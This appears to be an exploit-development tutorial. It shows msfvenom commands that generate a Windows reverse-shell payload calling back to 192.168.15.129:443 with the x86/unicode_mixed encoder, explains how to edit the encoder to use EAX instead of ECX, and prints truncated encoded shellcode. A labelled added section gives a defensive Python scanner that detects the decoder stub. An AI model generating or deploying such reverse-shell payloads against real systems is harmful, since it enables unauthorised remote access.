The x86/unicode_mixed encoder builds its payload around the ECX register by default, so when execution reaches the payload, ECX must point to the start of the payload.
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.15.129 LPORT=443 -f python -v payload -e x86/unicode_mixed
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 4086 bytes
payload = b""
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x34\x34\x34\x34\x6a\x58\x41\x51"
payload += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
payload += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
...
Locate the encoder file
┌──(kali㉿kali)-[~]
└─$ sudo updatedb
┌──(kali㉿kali)-[~]
└─$ locate x86/unicode_mixed
/usr/share/metasploit-framework/modules/encoders/x86/unicode_mixed.rb
Replace ECX in that file with the register you need, for example EAX.

Generate the payload using EAX
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.15.129 LPORT=443 -f python -v payload -e x86/unicode_mixed
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 4086 bytes
payload = b""
payload += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
payload += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
payload += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
...
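The two outputs above differ only in their leading bytes: the ECX build opens with repeated "IA" pairs, while the EAX build opens with "PPYA" before the same "IA" pairs, and both then reach the identical decoder sequence "jXAQADAZABARALAYAIAQAIAQAIAh". The following is an added example, not code from the original post or from Metasploit: a small Python scanner that checks a buffer stays within the printable byte range this encoder relies on, locates that decoder sequence, and reports which register prefix precedes it. The stub and prefix bytes are taken from the outputs above; the sample buffers are constructed from the first five payload lines of each output and are therefore truncated. Reading "IA" as inc/dec ECX filler is my interpretation of the opcode values 0x49 and 0x41, not something the post states.

```python
# Added example (not from the original post or from Metasploit): recognise the
# x86/unicode_mixed decoder stub in a byte buffer and report which
# buffer-register prefix precedes it.

# Opening bytes of the decoder, identical in both msfvenom outputs above.
UNICODE_MIXED_STUB = b"jXAQADAZABARALAYAIAQAIAQAIAh"

# Prefixes seen on the page. 'P' is 0x50 (push eax) and 'Y' is 0x59 (pop ecx),
# so "PPYA" copies the EAX buffer pointer into ECX before the decoder runs.
# When ECX already points at the payload, only "IA" pairs precede the decoder
# (0x49 dec ecx / 0x41 inc ecx; treating them as filler is an assumption).
REGISTER_PREFIXES = {b"PPYA": "EAX", b"IA": "ECX"}

# Constructed samples: the first five payload lines of each output above.
SAMPLE_ECX = (
    b"\x49\x41" * 14 + b"\x34\x34\x34\x34"
    + b"\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
    + b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
)
SAMPLE_EAX = (
    b"\x50\x50\x59\x41" + b"\x49\x41" * 14
    + b"\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
    + b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
)


def is_unicode_safe(buf: bytes) -> bool:
    """True if every byte is printable ASCII (0x20..0x7e).

    The encoder stays inside this range so the bytes survive an ANSI to
    UTF-16 widening, which inserts a 0x00 after each of them."""
    return all(0x20 <= b <= 0x7e for b in buf)


def widen_to_utf16(buf: bytes) -> bytes:
    """Return what a target sees after converting the bytes to UTF-16LE:
    each original byte followed by 0x00."""
    return buf.decode("latin-1").encode("utf-16-le")


def find_unicode_mixed(buf: bytes):
    """Locate the decoder stub and classify the bytes in front of it.

    Returns None when the stub is absent; otherwise a dict with the stub
    offset, the buffer register implied by the leading bytes ('unknown' when
    they match neither prefix from the page) and the number of "IA" pairs
    between the register prefix and the stub."""
    off = buf.find(UNICODE_MIXED_STUB)
    if off == -1:
        return None
    register, prefix_len = "unknown", 0
    if buf.startswith(b"PPYA"):
        register, prefix_len = REGISTER_PREFIXES[b"PPYA"], 4
    elif buf.startswith(b"IA"):
        register = REGISTER_PREFIXES[b"IA"]
    ia_pairs = buf[prefix_len:off].count(b"IA")
    return {"offset": off, "register": register, "ia_pairs": ia_pairs}


if __name__ == "__main__":
    for name, sample in (("ECX build", SAMPLE_ECX), ("EAX build", SAMPLE_EAX)):
        print(name, is_unicode_safe(sample), find_unicode_mixed(sample))
    print(widen_to_utf16(b"PPYA"))
```

Both constructed samples report the stub at offset 32: the ECX build spends those bytes on fourteen "IA" pairs plus "4444", the EAX build on "PPYA" plus the same fourteen pairs. A buffer containing bytes outside the printable range, or lacking the stub, is reported as not matching, which is the behaviour a scanner built on this signature should have.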
This article describes how to use the msfvenom tool to generate a shell_reverse_tcp payload for the Windows platform with the x86/unicode_mixed encoder. By default the payload is generated around the ECX register, but the author shows how to modify the code so that the payload uses the EAX register instead. The process involves the encoding and decoding of the payload and the relevant modules of the Metasploit framework.
